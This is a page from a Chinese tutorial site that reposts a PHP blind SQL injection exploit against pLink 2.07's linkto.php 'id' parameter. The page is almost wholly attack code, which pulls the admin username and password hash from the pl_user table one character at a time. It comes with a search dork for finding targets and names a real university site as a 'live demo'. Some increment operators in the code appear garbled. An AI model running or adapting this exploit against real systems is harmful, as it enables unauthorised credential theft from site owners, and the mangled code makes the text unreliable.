手机
当前位置:查字典教程网 >网络安全 >Exploit >pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit
pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit
摘要:

<?php

ini_set("max_execution_time",0);

print_r('

###############################################################

#

# pLink 2.07 - Blind SQL Injection Exploit

#

# Vulnerability discovered by: Stack

# Exploit coded by: Stack

# Greetz to: All My Freind

#

###############################################################

#

# Dork: intext:"pLink 2.07"

# Admin Panel: [Target]/link/

# Usage: php '.$argv[0].' [Target] [Userid]

# Example for http://www.site.com/link/linkto.php?id=[Real id] 2

# => php '.$argv[0].' http://www.site.com/link/linkto.php?id=128 2

# Live Demo :

# http://www.uni-leipzig.de/fsrpowi/link/linkto.php?id=128 2

#

###############################################################

');

if ($argc > 1) {

$url = $argv[1];

if ($argc < 3) {

$userid = 1;

} else {

$userid = $argv[2];

}

$r = strlen(file_get_contents($url." and 1=1/*"));

echo "nExploiting:n";

$w = strlen(file_get_contents($url." and 1=0/*"));

$t = abs((100-($w/$r*100)));

echo "Password: ";

for ($j = 1; $j <= 32; $j ) {

for ($i = 46; $i <= 102; $i=$i 2) {

if ($i == 60) {

$i = 98;

}

$laenge = strlen(file_get_contents($url." and ascii(substring((select pwd from pl_user where id=".$userid." limit 0,1),".$j.",1))>".$i."/*"));

if (abs((100-($laenge/$r*100))) > $t-1) {

$laenge = strlen(file_get_contents($url." and ascii(substring((select pwd from pl_user where id=".$userid." limit 0,1),".$j.",1))>".($i-1)."/*"));

if (abs((100-($laenge/$r*100))) > $t-1) {

echo chr($i-1);

} else {

echo chr($i);

}

$i = 102;

}

}

}

echo "nUsername: ";

for ($i=1; $i <= 30; $i ) {

$laenge = strlen(file_get_contents($url." and ascii(substring((select username from pl_user where id=".$userid." limit 0,1),".$i.",1))!=0/*"));

if (abs((100-($laenge/$r*100))) > $t-1) {

$count = $i;

$i = 30;

}

}

for ($j = 1; $j < $count; $j ) {

for ($i = 46; $i <= 122; $i=$i 2) {

if ($i == 60) {

$i = 98;

}

$laenge = strlen(file_get_contents($url." and ascii(substring((select username from pl_user where id=".$userid." limit 0,1),".$j.",1))>".$i."/*"));

if (abs((100-($laenge/$r*100))) > $t-1) {

$laenge = strlen(file_get_contents($url." and ascii(substring((select username from pl_user where id=".$userid." limit 0,1),".$j.",1))>".($i-1)."/*"));

if (abs((100-($laenge/$r*100))) > $t-1) {

echo chr($i-1);

} else {

echo chr($i);

}

$i = 122;

}

}

}

} else {

echo "nExploiting failed: By Stackn";

}

?>

【pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit】相关文章:

HockeySTATS Online 2.0 Multiple Remote SQL Injection Vulnerabilities

IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Exploit

CodeDB (list.php lang) Local File Inclusion Vulnerability

AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability

Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF Exploit

ITechBids 7.0 Gold (XSS/SQL) Multiple Remote Vulnerabilities

Friendly Technologies (fwRemoteCfg.dll) ActiveX Command Exec Exploit

Ultra Office ActiveX Control Remote Buffer Overflow Exploit

TGS CMS 0.3.2r2 Remote Code Execution Exploit

DESlock 3.2.7 (vdlptokn.sys) Local Denial of Service Exploit

精品推荐
分类导航